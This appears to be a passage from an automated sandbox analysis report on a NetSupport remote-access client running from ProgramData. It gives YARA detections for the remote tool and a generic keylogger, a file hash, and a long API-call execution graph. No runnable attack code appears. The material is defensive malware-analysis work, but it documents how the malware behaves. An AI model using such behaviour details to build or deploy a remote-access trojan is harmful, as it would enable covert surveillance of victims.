                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.2180719969.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.2183988529.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              General

                                                                                                                                                                              Target ID:6
                                                                                                                                                                              Start time:12:13:13
                                                                                                                                                                              Start date:17/12/2024
                                                                                                                                                                              Path:C:\ProgramData\4dvs23l\client32.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\ProgramData\4dvs23l\client32.exe"
                                                                                                                                                                              Imagebase:0xc30000
                                                                                                                                                                              File size:103'824 bytes
                                                                                                                                                                              MD5 hash:C4F1B50E3111D29774F7525039FF7086
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2265922513.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.2262484311.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2265331091.0000000000C32000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2265885595.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.2265885595.0000000011194000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Disassembly

                                                                                                                                                                              Reset < >

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:5.7%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:20.1%
                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                Total number of Limit Nodes:122
                                                                                                                                                                                execution_graph 79371 6c6063a0 79372 6c6063a5 79371->79372 79373 6c6063b1 Sleep 79372->79373 79374 6c6063a9 WSACancelBlockingCall 79372->79374 79375 110179e0 GetTickCount 79382 110178f0 79375->79382 79383 11017910 79382->79383 79389 110179c6 79382->79389 79384 11017932 CoInitialize _GetRawWMIStringW 79383->79384 79386 11017929 WaitForSingleObject 79383->79386 79390 110179b2 79384->79390 79394 11017965 79384->79394 79386->79384 79387 110179d5 79395 11017810 79387->79395 79388 110179c0 CoUninitialize 79388->79389 79414 11162bb7 79389->79414 79390->79388 79390->79389 79391 110179ac 79427 111646f7 GetStringTypeW __fassign 79391->79427 79394->79390 79394->79391 79422 111648ed 79394->79422 79396 11017830 79395->79396 79402 110178d6 79395->79402 79398 11017848 CoInitialize _GetRawWMIStringW 79396->79398 79400 1101783f WaitForSingleObject 79396->79400 79397 11162bb7 __expandlocale 5 API calls 79399 110178e5 SetEvent GetTickCount 79397->79399 79403 110178c2 79398->79403 79405 1101787b 79398->79405 79408 11147060 79399->79408 79400->79398 79401 110178d0 CoUninitialize 79401->79402 79402->79397 79403->79401 79403->79402 79404 110178bc 79430 111646f7 GetStringTypeW __fassign 79404->79430 79405->79403 79405->79404 79407 111648ed std::locale::_Init 57 API calls 79405->79407 79407->79405 79409 11147071 79408->79409 79410 1114706c 79408->79410 79432 111464c0 79409->79432 79431 11146270 18 API calls std::locale::_Init 79410->79431 79415 11162bc1 IsDebuggerPresent 79414->79415 79416 11162bbf 79414->79416 79428 111784f7 79415->79428 79416->79387 79419 1116cb59 SetUnhandledExceptionFilter UnhandledExceptionFilter 79420 1116cb76 __expandlocale 79419->79420 79421 1116cb7e GetCurrentProcess TerminateProcess 79419->79421 79420->79421 79421->79387 79423 1116490d 79422->79423 79424 111648fb 79422->79424 79429 1116489c 57 API calls 2 library calls 79423->79429 79424->79394 79426 11164917 79426->79394 79427->79390 79428->79419 79429->79426 79430->79403 79431->79409 79435 11146370 79432->79435 79434 11017a27 79436 11146394 79435->79436 79437 11146399 79435->79437 79455 11146270 18 API calls std::locale::_Init 79436->79455 79439 11146402 79437->79439 79440 111463a2 79437->79440 79441 111464ae 79439->79441 79442 1114640f wsprintfA 79439->79442 79443 111463d9 79440->79443 79446 111463b0 79440->79446 79444 11162bb7 __expandlocale 5 API calls 79441->79444 79445 11146432 79442->79445 79449 11162bb7 __expandlocale 5 API calls 79443->79449 79447 111464ba 79444->79447 79445->79445 79448 11146439 wvsprintfA 79445->79448 79451 11162bb7 __expandlocale 5 API calls 79446->79451 79447->79434 79454 11146454 79448->79454 79450 111463fe 79449->79450 79450->79434 79452 111463d5 79451->79452 79452->79434 79453 111464a1 OutputDebugStringA 79453->79441 79454->79453 79454->79454 79455->79437 79456 110262c0 LoadLibraryA 79457 1113ad10 79458 1113ad1c 79457->79458 79459 1113add8 79458->79459 79463 1113adea 79458->79463 79464 1113ad78 79458->79464 79460 11139a70 374 API calls 79459->79460 79459->79463 79460->79463 79461 1113adb0 79477 11139a70 79461->79477 79464->79461 79464->79463 79467 1105e820 79464->79467 79465 1113adc1 79468 1105e84f 79467->79468 79469 1105e875 79468->79469 79470 1105e855 79468->79470 79472 11162bb7 __expandlocale 5 API calls 79469->79472 79557 1116450b 79470->79557 79474 1105e882 79472->79474 79474->79461 79475 11162bb7 __expandlocale 5 API calls 79476 1105e86f 79475->79476 79476->79461 79478 11139eaf 79477->79478 79481 11139a8d 79477->79481 79479 11162bb7 __expandlocale 5 API calls 79478->79479 79480 11139ebe 79479->79480 79480->79465 79481->79478 79597 11145c70 79481->79597 79483 11139acc 79483->79478 79484 1105e820 57 API calls 79483->79484 79485 11139afb 79484->79485 79630 1112d860 79485->79630 79487 11139c40 PostMessageA 79489 11139c55 79487->79489 79488 1105e820 57 API calls 79490 11139c3c 79488->79490 79491 11139c65 79489->79491 79644 11110000 InterlockedDecrement 79489->79644 79490->79487 79490->79489 79493 11139c6b 79491->79493 79494 11139c8d 79491->79494 79497 11139cc3 std::ios_base::_Tidy 79493->79497 79498 11139cde 79493->79498 79645 11131320 297 API calls std::locale::_Init 79494->79645 79496 11139c95 79646 11147ad0 249 API calls 79496->79646 79506 11162bb7 __expandlocale 5 API calls 79497->79506 79648 11143a50 79498->79648 79502 11139ce3 79653 11147af0 79502->79653 79503 11139c9f 79647 1112da60 SetDlgItemTextA 79503->79647 79507 11139cda 79506->79507 79507->79465 79509 11139cb0 std::ios_base::_Tidy 79509->79493 79510 11139d06 79656 111361c0 281 API calls 4 library calls 79510->79656 79513 11139beb 79513->79487 79513->79488 79514 11139d64 79515 11139d78 79514->79515 79516 11139e3c 79514->79516 79522 11139d9c 79515->79522 79659 111361c0 281 API calls 4 library calls 79515->79659 79520 11139e5d 79516->79520 79524 11139e4b 79516->79524 79525 11139e44 79516->79525 79517 11139d37 79517->79514 79521 11139d4c 79517->79521 79518 11139d0d std::ios_base::_Tidy 79518->79514 79518->79517 79657 111361c0 281 API calls 4 library calls 79518->79657 79665 110f8b70 64 API calls 79520->79665 79658 11132120 129 API calls 79521->79658 79661 110f8b70 64 API calls 79522->79661 79664 11132120 129 API calls 79524->79664 79663 111361c0 281 API calls 4 library calls 79525->79663 79528 11139da7 79528->79478 79534 11139daf IsWindowVisible 79528->79534 79530 11139d5c 79530->79514 79532 11139e68 79532->79478 79536 11139e6c IsWindowVisible 79532->79536 79534->79478 79538 11139dc6 79534->79538 79535 11139e5a 79535->79520 79536->79478 79539 11139e7e IsWindowVisible 79536->79539 79537 11139d86 79537->79522 79540 11139d92 79537->79540 79541 11145c70 std::locale::_Init 68 API calls 79538->79541 79539->79478 79542 11139e8b EnableWindow 79539->79542 79660 11132120 129 API calls 79540->79660 79544 11139dd1 79541->79544 79666 11132120 129 API calls 79542->79666 79544->79478 79548 11139ddc GetForegroundWindow IsWindowVisible 79544->79548 79546 11139d99 79546->79522 79547 11139ea2 EnableWindow 79547->79478 79549 11139e01 79548->79549 79550 11139df6 EnableWindow 79548->79550 79662 11132120 129 API calls 79549->79662 79550->79549 79552 11139e08 79553 11139e1e EnableWindow 79552->79553 79554 11139e17 SetForegroundWindow 79552->79554 79555 11162bb7 __expandlocale 5 API calls 79553->79555 79554->79553 79556 11139e38 79555->79556 79556->79465 79558 11164524 79557->79558 79561 111642e0 79558->79561 79560 1105e862 79560->79475 79566 11164259 79561->79566 79564 111642f4 79565 11164304 79564->79565 79574 11171a63 57 API calls 3 library calls 79564->79574 79565->79560 79567 1116426c 79566->79567 79573 111642b9 79566->79573 79575 1116c675 79567->79575 79570 11164299 79570->79573 79592 111715a2 38 API calls 5 library calls 79570->79592 79573->79564 79574->79564 79576 1116c67d 79575->79576 79577 11164271 79576->79577 79593 1116e66a 34 API calls 2 library calls 79576->79593 79577->79570 79579 11171306 79577->79579 79580 11171312 _doexit 79579->79580 79581 1116c675 __expandlocale 34 API calls 79580->79581 79582 11171317 79581->79582 79583 11171345 79582->79583 79584 11171329 79582->79584 79595 111712b9 18 API calls 3 library calls 79583->79595 79585 1116c675 __expandlocale 34 API calls 79584->79585 79587 1117132e 79585->79587 79590 1117133c _doexit 79587->79590 79594 1116e66a 34 API calls 2 library calls 79587->79594 79588 11171360 79596 11171373 LeaveCriticalSection _doexit 79588->79596 79590->79570 79592->79573 79595->79588 79596->79587 79598 11145c91 GetVersionExA 79597->79598 79607 11145e6c 79597->79607 79600 11145cb3 79598->79600 79598->79607 79599 11145e75 79602 11162bb7 __expandlocale 5 API calls 79599->79602 79601 11145cc0 RegOpenKeyExA 79600->79601 79600->79607 79603 11145ced 79601->79603 79601->79607 79604 11145e82 79602->79604 79667 11143bd0 RegQueryValueExA 79603->79667 79604->79483 79605 11145ed4 79606 11162bb7 __expandlocale 5 API calls 79605->79606 79608 11145ee4 79606->79608 79607->79599 79607->79605 79673 11081f20 79607->79673 79608->79483 79612 11143bd0 std::locale::_Init RegQueryValueExA 79614 11145d59 79612->79614 79613 11145ebc 79613->79599 79616 11163ca7 std::locale::_Init 57 API calls 79613->79616 79615 11145e5f RegCloseKey 79614->79615 79669 11163ca7 79614->79669 79615->79607 79618 11145ecd 79616->79618 79618->79599 79618->79605 79620 111648ed std::locale::_Init 57 API calls 79624 11145d7d 79620->79624 79621 11145d96 79623 11163ca7 std::locale::_Init 57 API calls 79621->79623 79622 111648ed std::locale::_Init 57 API calls 79622->79624 79626 11145da2 _strncpy 79623->79626 79624->79621 79624->79622 79625 11145e41 79625->79615 79626->79625 79627 11143bd0 std::locale::_Init RegQueryValueExA 79626->79627 79628 11145e18 79627->79628 79629 11143bd0 std::locale::_Init RegQueryValueExA 79628->79629 79629->79625 79631 1112d87c 79630->79631 79632 1112d8b7 79631->79632 79634 1112d8a4 79631->79634 79685 1106c340 280 API calls 79632->79685 79636 11147af0 251 API calls 79634->79636 79635 1112d8af 79637 1112d903 79635->79637 79686 11142e60 79635->79686 79636->79635 79637->79513 79639 11146710 79637->79639 79694 111103d0 79639->79694 79641 1114671f 79700 11145660 79641->79700 79644->79491 79645->79496 79646->79503 79647->79509 79649 11143a5f 79648->79649 79650 11143a59 79648->79650 79715 1102ad70 79649->79715 79650->79502 79940 111479b0 79653->79940 79656->79518 79657->79517 79658->79530 79659->79537 79660->79546 79661->79528 79662->79552 79663->79524 79664->79535 79665->79532 79666->79547 79668 11143bfa 79667->79668 79668->79612 79670 11163c91 79669->79670 79671 1116450b __wcstoi64 57 API calls 79670->79671 79672 11145d6e 79671->79672 79672->79620 79674 11081f2d 79673->79674 79675 11081f32 79673->79675 79683 11081c50 IsDBCSLeadByte 79674->79683 79676 11081f3b 79675->79676 79681 11081f53 79675->79681 79684 11164644 63 API calls __strnicmp_l 79676->79684 79679 11081f4c 79679->79613 79680 11166654 63 API calls std::locale::_Init 79680->79681 79681->79680 79682 11081f59 79681->79682 79682->79613 79683->79675 79684->79679 79685->79635 79687 11142e6a 79686->79687 79688 11142e6c 79686->79688 79687->79637 79689 11142e9b _strncpy 79688->79689 79690 11142eb9 79688->79690 79689->79637 79693 11029a70 247 API calls 2 library calls 79690->79693 79695 111103e7 EnterCriticalSection 79694->79695 79696 111103de GetCurrentThreadId 79694->79696 79697 111103fe ___DllMainCRTStartup 79695->79697 79696->79695 79698 11110405 LeaveCriticalSection 79697->79698 79699 11110418 LeaveCriticalSection 79697->79699 79698->79641 79699->79641 79711 110963b0 79700->79711 79703 11145684 wsprintfA 79704 11145697 79703->79704 79705 1114569b 79704->79705 79708 111456b2 79704->79708 79713 11029a70 247 API calls 2 library calls 79705->79713 79707 111456c3 79707->79513 79708->79707 79714 111452d0 5 API calls __expandlocale 79708->79714 79712 110963b9 LoadStringA 79711->79712 79712->79703 79712->79704 79714->79707 79718 11028c10 79715->79718 79717 1102ad7e 79717->79502 79719 11028c33 79718->79719 79729 1102927b 79718->79729 79720 11028cf0 GetModuleFileNameA 79719->79720 79731 11028c68 79719->79731 79723 11028d11 _strrchr 79720->79723 79721 11029317 79724 11162bb7 __expandlocale 5 API calls 79721->79724 79722 1102932a 79725 11162bb7 __expandlocale 5 API calls 79722->79725 79745 11164ead 79723->79745 79726 11029326 79724->79726 79727 1102933b 79725->79727 79726->79717 79727->79717 79729->79721 79729->79722 79730 11028ceb 79730->79729 79748 11026ef0 19 API calls 2 library calls 79730->79748 79733 11164ead std::locale::_Init 125 API calls 79731->79733 79733->79730 79734 11028d64 79735 11163ca7 std::locale::_Init 57 API calls 79734->79735 79741 110291e5 79734->79741 79737 11028d75 std::locale::_Init 79735->79737 79737->79741 79749 11026ef0 19 API calls 2 library calls 79737->79749 79739 11028db0 std::locale::_Init 79739->79741 79750 11026ef0 19 API calls 2 library calls 79739->79750 79752 11164c77 79741->79752 79743 1116558e 63 API calls _LanguageEnumProc@4 79744 11028dd3 __mbschr_l std::locale::_Init 79743->79744 79744->79741 79744->79743 79751 11026ef0 19 API calls 2 library calls 79744->79751 79760 11164df1 79745->79760 79747 11164ebf 79747->79730 79748->79734 79749->79739 79750->79744 79751->79744 79753 11164c83 _doexit 79752->79753 79754 11164c95 _doexit 79753->79754 79890 1116be59 79753->79890 79754->79729 79756 11164cc3 79894 11164c0a 79756->79894 79758 11164cce 79904 11164ce3 LeaveCriticalSection LeaveCriticalSection __fsopen 79758->79904 79761 11164dfd _doexit 79760->79761 79764 11164e10 _doexit @_EH4_CallFilterFunc@8 79761->79764 79768 11172558 79761->79768 79763 11164e42 79763->79764 79783 111722c1 79763->79783 79764->79747 79766 11164e88 79795 11164ea3 LeaveCriticalSection LeaveCriticalSection __fsopen 79766->79795 79769 11172564 _doexit 79768->79769 79770 111725ee 79769->79770 79781 111725e7 79769->79781 79799 1116be9a EnterCriticalSection 79769->79799 79800 1116bf08 LeaveCriticalSection LeaveCriticalSection _doexit 79769->79800 79801 1116ac39 Sleep 79770->79801 79773 111725f5 79774 11172603 InitializeCriticalSectionAndSpinCount 79773->79774 79773->79781 79775 11172636 EnterCriticalSection 79774->79775 79776 11172623 79774->79776 79775->79781 79802 11163aa5 79776->79802 79778 11172677 _doexit 79778->79763 79780 1117262b 79780->79781 79796 11172682 79781->79796 79784 111722e3 79783->79784 79786 111722f7 79784->79786 79794 111724ab 79784->79794 79811 1117a94d 54 API calls __fassign 79784->79811 79786->79766 79788 1117247a 79788->79786 79812 1117a7e7 63 API calls __mbsnbicmp_l 79788->79812 79790 111724a4 79790->79794 79813 1117a7e7 63 API calls __mbsnbicmp_l 79790->79813 79792 111724c3 79792->79794 79814 1117a7e7 63 API calls __mbsnbicmp_l 79792->79814 79794->79786 79808 1117a5c3 79794->79808 79795->79764 79807 111744c6 LeaveCriticalSection 79796->79807 79798 11172689 79798->79778 79799->79769 79800->79769 79801->79773 79803 11163ab0 HeapFree 79802->79803 79804 11163ad9 __dosmaperr 79802->79804 79803->79804 79805 11163ac5 79803->79805 79804->79780 79806 11163acb GetLastError 79805->79806 79806->79804 79807->79798 79815 1117a4ff 79808->79815 79810 1117a5de 79810->79786 79811->79788 79812->79790 79813->79792 79814->79794 79816 1117a50b _doexit 79815->79816 79820 1117a51e _doexit 79816->79820 79821 11179dcb 79816->79821 79818 1117a56e 79889 1117a595 LeaveCriticalSection __unlock_fhandle 79818->79889 79820->79810 79825 11179df2 __tsopen_nolock 79821->79825 79822 11179dcb __tsopen_nolock 102 API calls 79823 1117a56e 79822->79823 79824 1117a595 __wsopen_helper LeaveCriticalSection 79823->79824 79826 1117a51e _doexit 79824->79826 79827 11179e4d __waccess_s 79825->79827 79828 1117798a __alloc_osfhnd 9 API calls 79825->79828 79838 1117a077 __dosmaperr _doexit 79825->79838 79826->79818 79827->79818 79829 11179fc0 79828->79829 79829->79827 79830 11179fea CreateFileA 79829->79830 79831 1117a087 GetFileType 79830->79831 79832 1117a017 79830->79832 79833 1117a094 GetLastError 79831->79833 79834 1117a0d8 79831->79834 79835 1117a050 GetLastError 79832->79835 79837 1117a02b CreateFileA 79832->79837 79836 1116a1d5 __dosmaperr 79833->79836 79840 11177754 __set_osfhnd SetStdHandle 79834->79840 79835->79838 79839 1117a0bd CloseHandle 79836->79839 79837->79831 79837->79835 79838->79822 79838->79826 79839->79838 79848 1117a0cb 79839->79848 79841 1117a0f6 79840->79841 79842 1117a30c 79841->79842 79843 1117a14c 79841->79843 79847 1117a1bb 79841->79847 79842->79838 79845 1117a474 CloseHandle CreateFileA 79842->79845 79844 11175746 __lseek_nolock SetFilePointer GetLastError 79843->79844 79846 1117a156 79844->79846 79845->79848 79849 1117a4a1 GetLastError 79845->79849 79851 11175099 __read_nolock 13 API calls 79846->79851 79863 1117a15f __waccess_s 79846->79863 79847->79842 79852 1117a315 79847->79852 79864 1117a265 79847->79864 79848->79838 79850 1117a4ad __dosmaperr 79849->79850 79854 111777d5 __free_osfhnd SetStdHandle 79850->79854 79853 1117a189 79851->79853 79852->79842 79862 1117a332 79852->79862 79867 1117a289 79852->79867 79857 1117a1a2 79853->79857 79861 1117d104 __chsize_nolock 78 API calls 79853->79861 79854->79848 79855 1117a16c 79860 11171dc8 __close_nolock CloseHandle GetLastError SetStdHandle 79855->79860 79856 1117a2dd 79859 11175099 __read_nolock 13 API calls 79856->79859 79857->79855 79858 11175746 __lseek_nolock SetFilePointer GetLastError 79857->79858 79858->79863 79874 1117a2ea 79859->79874 79860->79838 79861->79857 79865 11176489 __lseeki64_nolock SetFilePointer GetLastError 79862->79865 79863->79847 79863->79855 79864->79842 79864->79856 79864->79867 79868 1117a2b4 79864->79868 79866 1117a33d 79865->79866 79866->79867 79870 1117a348 79866->79870 79867->79842 79867->79855 79871 111730a4 __write 75 API calls 79867->79871 79869 11176489 __lseeki64_nolock SetFilePointer GetLastError 79868->79869 79877 1117a2bf 79869->79877 79878 11176489 __lseeki64_nolock SetFilePointer GetLastError 79870->79878 79871->79867 79872 1117a373 79880 11171dc8 __close_nolock CloseHandle GetLastError SetStdHandle 79872->79880 79873 1117a38d 79875 1117a3af 79873->79875 79876 1117a394 79873->79876 79874->79842 79874->79855 79874->79872 79874->79873 79874->79875 79879 11175746 __lseek_nolock SetFilePointer GetLastError 79875->79879 79881 11175746 __lseek_nolock SetFilePointer GetLastError 79876->79881 79877->79867 79882 1117a2c6 79877->79882 79883 1117a352 79878->79883 79879->79883 79880->79838 79884 1117a39e 79881->79884 79885 11176489 __lseeki64_nolock SetFilePointer GetLastError 79882->79885 79883->79842 79883->79855 79884->79855 79887 1117a3a9 79884->79887 79888 1117a2d0 79885->79888 79887->79842 79888->79855 79888->79856 79889->79820 79891 1116be8d EnterCriticalSection 79890->79891 79892 1116be6b 79890->79892 79893 1116be73 79891->79893 79892->79891 79892->79893 79893->79756 79895 11164c2f 79894->79895 79898 11164c1b 79894->79898 79895->79898 79905 1116bf37 79895->79905 79898->79758 79900 11164c43 __flsbuf 79913 11171e64 79900->79913 79902 11164c4f 79902->79898 79903 11163aa5 _free 2 API calls 79902->79903 79903->79898 79904->79754 79906 1116bf50 __flsbuf 79905->79906 79908 11164c3b 79905->79908 79906->79908 79921 111730a4 75 API calls 5 library calls 79906->79921 79909 11171f28 79908->79909 79910 11171f38 79909->79910 79912 11171f44 79909->79912 79911 11163aa5 _free 2 API calls 79910->79911 79910->79912 79911->79912 79912->79900 79914 11171e70 _doexit 79913->79914 79915 11171e78 _doexit __waccess_s 79914->79915 79922 111778c4 79914->79922 79915->79902 79917 11171edf 79919 11171ef3 79917->79919 79930 11171dc8 79917->79930 79937 11171f20 LeaveCriticalSection __unlock_fhandle 79919->79937 79921->79908 79923 111778d0 _doexit 79922->79923 79924 1117792a 79923->79924 79927 11177905 InitializeCriticalSectionAndSpinCount 79923->79927 79928 11177918 79923->79928 79925 1117792f EnterCriticalSection 79924->79925 79926 1117794c _doexit 79924->79926 79925->79926 79926->79917 79927->79928 79938 1117795a LeaveCriticalSection _doexit 79928->79938 79933 11171dd8 __chsize_nolock 79930->79933 79931 11171e2e 79939 111777d5 SetStdHandle __waccess_s 79931->79939 79933->79931 79934 11171e18 CloseHandle 79933->79934 79934->79931 79935 11171e24 GetLastError 79934->79935 79935->79931 79936 11171e36 __dosmaperr 79936->79919 79937->79915 79938->79924 79939->79936 79941 110963b0 79940->79941 79942 111479de LoadStringA 79941->79942 79943 11147a02 79942->79943 79944 111479f0 79942->79944 79946 11147a1e 79943->79946 79947 11147a09 wsprintfA 79943->79947 79969 111452d0 5 API calls __expandlocale 79944->79969 79948 11147a3a 79946->79948 79949 11147a26 79946->79949 79947->79948 79955 11147850 79948->79955 79970 11029a70 247 API calls 2 library calls 79949->79970 79953 11162bb7 __expandlocale 5 API calls 79954 11139cea SetWindowTextA 79953->79954 79954->79510 79954->79518 79971 11081d30 79955->79971 79957 111478a0 79958 111478e3 wvsprintfA 79957->79958 79959 111648ed std::locale::_Init 57 API calls 79957->79959 79960 111478f8 79958->79960 79961 111478b3 79959->79961 79962 11147060 std::locale::_Init 21 API calls 79960->79962 79965 11147914 79960->79965 79961->79958 79964 111478c0 FormatMessageA 79961->79964 79962->79965 79963 11142e60 std::locale::_Init 247 API calls 79966 11147924 79963->79966 79964->79960 79965->79963 79967 11162bb7 __expandlocale 5 API calls 79966->79967 79968 111479a6 79967->79968 79968->79953 79969->79943 79972 11081d3c 79971->79972 79974 11081d41 __mbschr_l std::locale::_Init 79971->79974 79975 11081c50 IsDBCSLeadByte 79972->79975 79974->79957 79975->79974 79976 c31020 GetCommandLineA 79980 c31035 GetStartupInfoA 79976->79980 79978 c31090 GetModuleHandleA 79983 c31000 _NSMClient32 79978->79983 79979 c3108b 79979->79978 79980->79978 79980->79979 79982 c310a2 ExitProcess 79983->79982 79984 11041180 79985 110411b2 79984->79985 79986 110411b8 79985->79986 79991 110411d4 79985->79991 79987 110fb470 15 API calls 79986->79987 79989 110411ca CloseHandle 79987->79989 79988 110412e8 79990 11162bb7 __expandlocale 5 API calls 79988->79990 79989->79991 79993 110412f5 79990->79993 79991->79988 79997 1104120d 79991->79997 80016 110881d0 274 API calls 4 library calls 79991->80016 79992 11041268 80006 110fb470 GetTokenInformation 79992->80006 79996 1104127a 79998 11041282 CloseHandle 79996->79998 80001 11041289 79996->80001 79997->79988 79997->79992 79998->80001 79999 110412cb 80002 11162bb7 __expandlocale 5 API calls 79999->80002 80000 110412b1 80004 11162bb7 __expandlocale 5 API calls 80000->80004 80001->79999 80001->80000 80003 110412e4 80002->80003 80005 110412c7 80004->80005 80007 110fb4b8 80006->80007 80008 110fb4a7 80006->80008 80017 110f2300 9 API calls 80007->80017 80009 11162bb7 __expandlocale 5 API calls 80008->80009 80011 110fb4b4 80009->80011 80011->79996 80012 110fb4dc 80012->80008 80013 110fb4e4 80012->80013 80014 11162bb7 __expandlocale 5 API calls 80013->80014 80015 110fb50a 80014->80015 80015->79996 80016->79997 80017->80012 80018 11030da7 80019 11030db0 WaitForSingleObject 80018->80019 80019->80019 80020 11030dc2 CloseHandle 80019->80020 80021 11030dd3 FreeLibrary 80020->80021 80022 11030dda CloseHandle 80020->80022 80021->80022 80027 1108a980 80022->80027 80024 11030df0 80025 11162bb7 __expandlocale 5 API calls 80024->80025 80026 11031773 80025->80026 80028 1108aa27 80027->80028 80032 1108a9ba std::ios_base::_Tidy 80027->80032 80029 1108aa2e DeleteCriticalSection 80028->80029 80034 1115c2d0 80029->80034 80030 1108a9ce CloseHandle 80030->80032 80032->80028 80032->80030 80033 1108aa54 std::ios_base::_Tidy 80033->80024 80037 1115c2e4 80034->80037 80035 1115c2e8 80035->80033 80037->80035 80038 1115c040 RaiseException HeapFree GetLastError std::_Xinvalid_argument std::ios_base::_Tidy 80037->80038 80038->80037 80039 11144dd0 80040 11144de1 80039->80040 80053 111447f0 80040->80053 80044 11144e65 80047 11144e82 80044->80047 80049 11144e64 80044->80049 80045 11144e2b 80046 11144e32 ResetEvent 80045->80046 80061 111449b0 247 API calls 2 library calls 80046->80061 80049->80044 80062 111449b0 247 API calls 2 library calls 80049->80062 80050 11144e46 SetEvent WaitForMultipleObjects 80050->80046 80050->80049 80052 11144e7f 80052->80047 80054 111447fc GetCurrentProcess 80053->80054 80055 1114481f 80053->80055 80054->80055 80056 1114480d GetModuleFileNameA 80054->80056 80057 11144849 WaitForMultipleObjects 80055->80057 80063 111101b0 80055->80063 80056->80055 80057->80044 80057->80045 80061->80050 80062->80052 80064 111101ce 80063->80064 80065 11110203 80064->80065 80066 111101d7 wsprintfA 80064->80066 80069 11162bb7 __expandlocale 5 API calls 80065->80069 80085 11029a70 247 API calls 2 library calls 80066->80085 80070 1111021d 80069->80070 80070->80057 80071 11144140 GetModuleFileNameA 80070->80071 80072 111441c3 80071->80072 80073 11144183 80071->80073 80075 111441cf LoadLibraryA 80072->80075 80076 111441e9 GetModuleHandleA GetProcAddress 80072->80076 80086 11081e00 80073->80086 80075->80076 80078 111441de LoadLibraryA 80075->80078 80079 11144217 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 80076->80079 80080 11144209 80076->80080 80077 11144191 80077->80072 80081 11144198 LoadLibraryA 80077->80081 80078->80076 80082 11144243 10 API calls 80079->80082 80080->80082 80081->80072 80083 11162bb7 __expandlocale 5 API calls 80082->80083 80084 111442c0 80083->80084 80084->80057 80088 11081e13 _strrchr 80086->80088 80087 11081e2a std::locale::_Init 80087->80077 80088->80087 80090 11081c50 IsDBCSLeadByte 80088->80090 80090->80087 80091 6c625ae6 80092 6c625af1 ___security_init_cookie 80091->80092 80093 6c625af6 80091->80093 80092->80093 80096 6c6259f0 80093->80096 80095 6c625b04 80099 6c6259fc 80096->80099 80097 6c625a41 __CRT_INIT 80098 6c625a9d 80097->80098 80100 6c625a54 80097->80100 80098->80095 80099->80097 80099->80098 80099->80100 80102 6c625a70 __CRT_INIT 80100->80102 80103 6c625a82 80100->80103 80101 6c625a91 __CRT_INIT 80101->80098 80102->80103 80103->80098 80103->80101 80104 1102ec2c 80521 11143630 80104->80521 80106 1102ec3a 80529 11143780 80106->80529 80109 1102ec91 80112 11143780 64 API calls 80109->80112 80111 1102ec76 80113 11081e70 64 API calls 80111->80113 80114 1102ecba 80112->80114 80113->80109 80115 11163ca7 std::locale::_Init 57 API calls 80114->80115 80119 1102ecc7 80114->80119 80115->80119 80116 1102ecf6 80117 1102ed75 CreateEventA 80116->80117 80118 1102ed4f GetSystemMetrics 80116->80118 80125 1102ed95 80117->80125 80126 1102eda9 80117->80126 80118->80117 80120 1102ed5e 80118->80120 80119->80116 80121 11145c70 std::locale::_Init 68 API calls 80119->80121 80122 11147060 std::locale::_Init 21 API calls 80120->80122 80121->80116 80124 1102ed68 80122->80124 81251 1102d900 80124->81251 81396 11029a70 247 API calls 2 library calls 80125->81396 80128 111101b0 std::locale::_Init 247 API calls 80126->80128 80130 1102edb0 80128->80130 80535 11110de0 80130->80535 80132 1102edd0 80133 111101b0 std::locale::_Init 247 API calls 80132->80133 80134 1102ede4 80133->80134 80135 11110de0 409 API calls 80134->80135 80136 1102ee04 80135->80136 80137 111101b0 std::locale::_Init 247 API calls 80136->80137 80138 1102ee83 80137->80138 80561 11061aa0 80138->80561 80141 111101b0 std::locale::_Init 247 API calls 80142 1102eecd 80141->80142 80143 1102eef6 FindWindowA 80142->80143 80144 1102f032 80143->80144 80145 1102ef2b 80143->80145 80575 11061ef0 80144->80575 80145->80144 80148 1102ef43 GetWindowThreadProcessId 80145->80148 80150 11147060 std::locale::_Init 21 API calls 80148->80150 80149 11061ef0 250 API calls 80151 1102f050 80149->80151 80152 1102ef60 OpenProcess 80150->80152 80153 11061ef0 250 API calls 80151->80153 80152->80144 80154 1102ef7d 80152->80154 80155 1102f05c 80153->80155 81397 11094f00 83 API calls 80154->81397 80157 1102f073 80155->80157 80158 1102f06a 80155->80158 80582 111464e0 80157->80582 81398 11028360 97 API calls 2 library calls 80158->81398 80159 1102ef9c 80162 11147060 std::locale::_Init 21 API calls 80159->80162 80165 1102efb0 80162->80165 80163 1102f06f 80163->80157 80164 1102f082 80597 11145990 ExpandEnvironmentStringsA 80164->80597 80166 1102efef CloseHandle FindWindowA 80165->80166 80169 11147060 std::locale::_Init 21 API calls 80165->80169 80167 1102f022 80166->80167 80168 